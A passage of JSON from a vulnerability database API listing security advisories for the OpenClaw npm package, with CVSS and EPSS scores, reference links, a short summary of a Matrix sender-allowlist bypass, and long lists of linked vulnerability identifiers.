                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x2cm-hg9c-mf5w"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35662",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35662"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-missing-controlscope-enforcement-in-send-action",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T18:24:11Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-missing-controlscope-enforcement-in-send-action"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x2cm-hg9c-mf5w",
                    "reference_id": "GHSA-x2cm-hg9c-mf5w",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x2cm-hg9c-mf5w"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35662",
                "GHSA-x2cm-hg9c-mf5w"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1728-wc17-dud6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89969?format=api",
            "vulnerability_id": "VCID-1j3m-fecr-f7cn",
            "summary": "OpenClaw: Matrix thread root and reply context bypass sender allowlist\n## Summary\nMatrix thread root and reply context bypass sender allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 Matrix because fetched thread-root/reply context bypasses sender allowlists, with unreleased mainline filtering fix.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8a563d603b70ef6338915f0527bee87282c3bad5` — 2026-03-31T17:09:03+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41376",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04376",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0439",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00017",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04402",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41376"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/8a563d603b70ef6338915f0527bee87282c3bad5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/8a563d603b70ef6338915f0527bee87282c3bad5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rg8m-3943-vm6q",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rg8m-3943-vm6q"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41376",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41376"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-matrix-thread-context-allowlist-bypass-via-sender-validation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-matrix-thread-context-allowlist-bypass-via-sender-validation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rg8m-3943-vm6q",
                    "reference_id": "GHSA-rg8m-3943-vm6q",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rg8m-3943-vm6q"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
